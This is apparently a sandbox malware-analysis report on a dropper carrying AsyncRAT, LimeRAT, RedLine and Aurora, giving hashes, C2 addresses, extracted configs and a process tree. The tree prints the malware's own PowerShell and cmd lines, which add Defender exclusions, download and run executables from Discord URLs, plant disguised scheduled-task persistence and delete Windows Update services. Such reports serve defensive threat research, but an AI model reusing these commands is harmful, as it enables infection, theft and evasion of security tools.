asyncrat | 6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee

Resubmissions

21-11-2023 02:40

231121-c57v5sbf69 10

21-11-2023 02:31

231121-cz55cscc61 10

Analysis

max time kernel
114s
max time network
118s
platform
windows10-2004_x64
resource
win10v2004-20231025-en
resource tags

arch:x64arch:x86image:win10v2004-20231025-enlocale:en-usos:windows10-2004-x64system
submitted
21-11-2023 02:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
Size

18.0MB
MD5

ab572c3d1e6ecab24e20a1f858eb57a1
SHA1

76fcdcb011b4edf3f5178ab0e08033d89d628902
SHA256

6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee
SHA512

7354a60e927ddbf44e47d7febb068b3792ade2a9dd96f6ea07d6bb036fff4eaaf19977649e9784c80ba61d3655598e0d82aed333b2cd9610aa35babfb9a7d7bf
SSDEEP

393216:ARFbqnGONtcDEo7nKhgqgLsqpbe9+MxAa+kiUTg5Dqw:ArU13o7ZLsAH5Sdw

Score

10^/10

asyncrat aurora limerat redline @miroskati new evasion infostealer rat stealer upx vmprotect

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/898655642749915136/Cypher_Rat.exe

Extracted

Family

limerat

Attributes

aes_key
123
antivm
true
c2_url
https://pastebin.com/raw/mchxnAbT
delay
80
download_payload
false
install
true
install_name
WindosCert.exe
main_folder
AppData
pin_spread
true
sub_folder
\
usb_spread
true

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

NEW

Mutex

ihouhh

Attributes

delay
80
install
true
install_file
UpdateChromeDay.exe
install_folder
%AppData%
pastebin_config
https://pastebin.com/raw/mchxnAbT

aes.plain

Extracted

Family

redline

185.215.113.69:15544

62.204.41.141:24758

45.15.157.131:36457

Attributes

auth_value
971353143dce4409844e1f4f0f5f7af8

Extracted

Family

redline

Botnet

@Miroskati

ofriaransim.shop:80

Attributes

auth_value
384ebbf9bd4d7e80bf3269909b298f87

Extracted

Family

aurora

37.220.87.13:8081

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora
LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

Async RAT payload 4 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\directxMer.exe	asyncrat
C:\Users\Admin\AppData\Local\Temp\directxMer.exe	asyncrat
C:\Users\Admin\AppData\Local\Temp\directxMer.exe	asyncrat
behavioral2/memory/3068-59-0x0000000000730000-0x0000000000752000-memory.dmp	asyncrat

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe

Executes dropped EXE 10 IoCs

Processes:

ChromeUpdate.exedirectx.exedirectxc.exedirectxCrack.exereg.exedirectxMer.exedirectxUp.exedirectxw.exeCypher.exevsdir.exe

pid	process
4348	ChromeUpdate.exe
1828	directx.exe
2112	directxc.exe
3808	directxCrack.exe
4216	reg.exe
3068	directxMer.exe
3684	directxUp.exe
2228	directxw.exe
4968	Cypher.exe
1232	vsdir.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe	upx
C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe	upx
C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe	upx
behavioral2/memory/4348-18-0x0000000000860000-0x0000000000BE4000-memory.dmp	upx
behavioral2/memory/4348-145-0x0000000000860000-0x0000000000BE4000-memory.dmp	upx
behavioral2/memory/4348-196-0x0000000000860000-0x0000000000BE4000-memory.dmp	upx
behavioral2/memory/4348-301-0x0000000000860000-0x0000000000BE4000-memory.dmp	upx
behavioral2/memory/4348-413-0x0000000000860000-0x0000000000BE4000-memory.dmp	upx

VMProtect packed file 8 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/1080-2-0x0000000000400000-0x000000000273B000-memory.dmp	vmprotect
behavioral2/memory/1080-1-0x0000000000400000-0x000000000273B000-memory.dmp	vmprotect
C:\Users\Admin\AppData\Local\Temp\directxw.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\directxw.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\directxw.exe	vmprotect
behavioral2/memory/1080-104-0x0000000000400000-0x000000000273B000-memory.dmp	vmprotect
behavioral2/memory/2228-148-0x0000000000400000-0x000000000132A000-memory.dmp	vmprotect
behavioral2/memory/2228-153-0x0000000000400000-0x000000000132A000-memory.dmp	vmprotect

Suspicious use of SetThreadContext 4 IoCs

Processes:

directx.exereg.exedirectxUp.exevsdir.exe

description	pid	process	target process
PID 1828 set thread context of 4236	1828	directx.exe	AppLaunch.exe
PID 4216 set thread context of 3524	4216	reg.exe	AppLaunch.exe
PID 3684 set thread context of 2196	3684	directxUp.exe	AppLaunch.exe
PID 1232 set thread context of 4312	1232	vsdir.exe	AppLaunch.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

532 sc.exe
4292 sc.exe
4500 sc.exe
4536 sc.exe
2644 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
532	sc.exe
4292	sc.exe
4500	sc.exe
4536	sc.exe
2644	sc.exe

LimeRat 4 IoCs

LimeRat.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\directxCrack.exe	Backdoor_Win32_LimeRAT
C:\Users\Admin\AppData\Local\Temp\directxCrack.exe	Backdoor_Win32_LimeRAT
behavioral2/memory/3808-65-0x00000000000C0000-0x00000000000DE000-memory.dmp	Backdoor_Win32_LimeRAT
C:\Users\Admin\AppData\Local\Temp\directxCrack.exe	Backdoor_Win32_LimeRAT

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exepowershell.exedirectxw.exepowershell.exepowershell.exe

pid	process
1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
2608	powershell.exe
2608	powershell.exe
2228	directxw.exe
2228	directxw.exe
2228	directxw.exe
2228	directxw.exe
2608	powershell.exe
4840	powershell.exe
4840	powershell.exe
4344	powershell.exe
4344	powershell.exe
4344	powershell.exe
4840	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2608 powershell.exe
Token: SeDebugPrivilege 4840 powershell.exe
Token: SeDebugPrivilege 4344 powershell.exe

description	pid	process
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeDebugPrivilege	4840	powershell.exe
Token: SeDebugPrivilege	4344	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exeCypher.exedirectx.exereg.exedirectxUp.exevsdir.execmd.exesihclient.exedirectxw.exe

description	pid	process	target process
PID 1080 wrote to memory of 2608	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	powershell.exe
PID 1080 wrote to memory of 2608	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	powershell.exe
PID 1080 wrote to memory of 2608	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	powershell.exe
PID 1080 wrote to memory of 4348	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	ChromeUpdate.exe
PID 1080 wrote to memory of 4348	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	ChromeUpdate.exe
PID 1080 wrote to memory of 1828	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	directx.exe
PID 1080 wrote to memory of 1828	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	directx.exe
PID 1080 wrote to memory of 1828	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	directx.exe
PID 1080 wrote to memory of 2112	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	directxc.exe
PID 1080 wrote to memory of 2112	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	directxc.exe
PID 1080 wrote to memory of 3808	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	directxCrack.exe
PID 1080 wrote to memory of 3808	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	directxCrack.exe
PID 1080 wrote to memory of 3808	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	directxCrack.exe
PID 1080 wrote to memory of 4216	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	reg.exe
PID 1080 wrote to memory of 4216	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	reg.exe
PID 1080 wrote to memory of 4216	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	reg.exe
PID 1080 wrote to memory of 3068	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	directxMer.exe
PID 1080 wrote to memory of 3068	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	directxMer.exe
PID 1080 wrote to memory of 3068	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	directxMer.exe
PID 1080 wrote to memory of 3684	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	directxUp.exe
PID 1080 wrote to memory of 3684	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	directxUp.exe
PID 1080 wrote to memory of 3684	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	directxUp.exe
PID 1080 wrote to memory of 2228	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	directxw.exe
PID 1080 wrote to memory of 2228	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	directxw.exe
PID 1080 wrote to memory of 2228	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	directxw.exe
PID 1080 wrote to memory of 1232	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	vsdir.exe
PID 1080 wrote to memory of 1232	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	vsdir.exe
PID 1080 wrote to memory of 1232	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	vsdir.exe
PID 1080 wrote to memory of 4968	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	Cypher.exe
PID 1080 wrote to memory of 4968	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	Cypher.exe
PID 1080 wrote to memory of 4968	1080	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	Cypher.exe
PID 4968 wrote to memory of 4500	4968	Cypher.exe	sihclient.exe
PID 4968 wrote to memory of 4500	4968	Cypher.exe	sihclient.exe
PID 4968 wrote to memory of 4500	4968	Cypher.exe	sihclient.exe
PID 4968 wrote to memory of 4908	4968	Cypher.exe	cmd.exe
PID 4968 wrote to memory of 4908	4968	Cypher.exe	cmd.exe
PID 4968 wrote to memory of 4908	4968	Cypher.exe	cmd.exe
PID 1828 wrote to memory of 4236	1828	directx.exe	AppLaunch.exe
PID 1828 wrote to memory of 4236	1828	directx.exe	AppLaunch.exe
PID 1828 wrote to memory of 4236	1828	directx.exe	AppLaunch.exe
PID 1828 wrote to memory of 4236	1828	directx.exe	AppLaunch.exe
PID 1828 wrote to memory of 4236	1828	directx.exe	AppLaunch.exe
PID 4216 wrote to memory of 3524	4216	reg.exe	AppLaunch.exe
PID 4216 wrote to memory of 3524	4216	reg.exe	AppLaunch.exe
PID 4216 wrote to memory of 3524	4216	reg.exe	AppLaunch.exe
PID 4216 wrote to memory of 3524	4216	reg.exe	AppLaunch.exe
PID 3684 wrote to memory of 2196	3684	directxUp.exe	AppLaunch.exe
PID 3684 wrote to memory of 2196	3684	directxUp.exe	AppLaunch.exe
PID 3684 wrote to memory of 2196	3684	directxUp.exe	AppLaunch.exe
PID 3684 wrote to memory of 2196	3684	directxUp.exe	AppLaunch.exe
PID 4216 wrote to memory of 3524	4216	reg.exe	AppLaunch.exe
PID 3684 wrote to memory of 2196	3684	directxUp.exe	AppLaunch.exe
PID 1232 wrote to memory of 4312	1232	vsdir.exe	AppLaunch.exe
PID 1232 wrote to memory of 4312	1232	vsdir.exe	AppLaunch.exe
PID 1232 wrote to memory of 4312	1232	vsdir.exe	AppLaunch.exe
PID 1232 wrote to memory of 4312	1232	vsdir.exe	AppLaunch.exe
PID 1232 wrote to memory of 4312	1232	vsdir.exe	AppLaunch.exe
PID 4908 wrote to memory of 4344	4908	cmd.exe	powershell.exe
PID 4908 wrote to memory of 4344	4908	cmd.exe	powershell.exe
PID 4908 wrote to memory of 4344	4908	cmd.exe	powershell.exe
PID 4500 wrote to memory of 4840	4500	sihclient.exe	powershell.exe
PID 4500 wrote to memory of 4840	4500	sihclient.exe	powershell.exe
PID 4500 wrote to memory of 4840	4500	sihclient.exe	powershell.exe
PID 2228 wrote to memory of 2628	2228	directxw.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
"C:\Users\Admin\AppData\Local\Temp\6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1080

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAcgBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAZwB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbgB5ACMAPgA="
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608

C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe"
2⤵
- Executes dropped EXE
PID:4348

C:\Users\Admin\AppData\Local\Temp\directx.exe
"C:\Users\Admin\AppData\Local\Temp\directx.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1828

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:4236

C:\Users\Admin\AppData\Local\Temp\directxc.exe
"C:\Users\Admin\AppData\Local\Temp\directxc.exe"
2⤵
- Executes dropped EXE
PID:2112

C:\Users\Admin\AppData\Local\Temp\directxERR.exe
"C:\Users\Admin\AppData\Local\Temp\directxERR.exe"
2⤵
PID:4216

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:3524

C:\Users\Admin\AppData\Local\Temp\directxMer.exe
"C:\Users\Admin\AppData\Local\Temp\directxMer.exe"
2⤵
- Executes dropped EXE
PID:3068

C:\Users\Admin\AppData\Local\Temp\directxCrack.exe
"C:\Users\Admin\AppData\Local\Temp\directxCrack.exe"
2⤵
- Executes dropped EXE
PID:3808

C:\Users\Admin\AppData\Local\Temp\directxw.exe
"C:\Users\Admin\AppData\Local\Temp\directxw.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c mode con cols=70 lines=20
3⤵
PID:2628

C:\Windows\SysWOW64\mode.com
mode con cols=70 lines=20
4⤵
PID:4292

C:\Users\Admin\AppData\Local\Temp\directxUp.exe
"C:\Users\Admin\AppData\Local\Temp\directxUp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3684

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:2196

C:\Users\Admin\AppData\Local\Temp\Cypher.exe
"C:\Users\Admin\AppData\Local\Temp\Cypher.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4968

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg', (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe', (Join-Path -Path $env:AppData -ChildPath 'hivee.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe', (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe', (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/898655642749915136/Cypher_Rat.exe', (Join-Path -Path ($pwd).path -ChildPath 'Cypher_Rat.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hivee.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe')" & powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'Cypher_Rat.exe')" & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:4908

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4344

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
4⤵
PID:1964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg', (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg'))"
4⤵
PID:2208

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe', (Join-Path -Path $env:AppData -ChildPath 'hivee.exe'))"
4⤵
PID:1924

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe', (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe'))"
4⤵
PID:2484

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe', (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe'))"
4⤵
PID:3140

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/898655642749915136/Cypher_Rat.exe', (Join-Path -Path ($pwd).path -ChildPath 'Cypher_Rat.exe'))"
4⤵
PID:1652

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Extracting Files, Please Wait..','Error','OK','Error')"
3⤵
PID:4500

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Extracting Files, Please Wait..','Error','OK','Error')"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4840

C:\Users\Admin\AppData\Local\Temp\vsdir.exe
"C:\Users\Admin\AppData\Local\Temp\vsdir.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1232

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:4312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:2868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rnspek#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:4504

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:4076

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
PID:2956

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
PID:1240

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
PID:5036

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
PID:1324

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:3792

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:532

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:4292

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:4500

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:4536

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:2644

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4216

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
2⤵
PID:1656

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
2⤵
PID:2092

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
2⤵
PID:1172

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:1528

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv N8M6ZvYPQE+Q7MxwVkvZQg.0.2
1⤵
- Suspicious use of WriteProcessMemory
PID:4500

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
1⤵
PID:3452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#egwjvgqbr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
1⤵
PID:4072

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
2⤵
PID:1452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kfFOWYirmgby{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WIwaWfcprYImqx,[Parameter(Position=1)][Type]$gEuEtAttsP)$waJsBBGtASL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 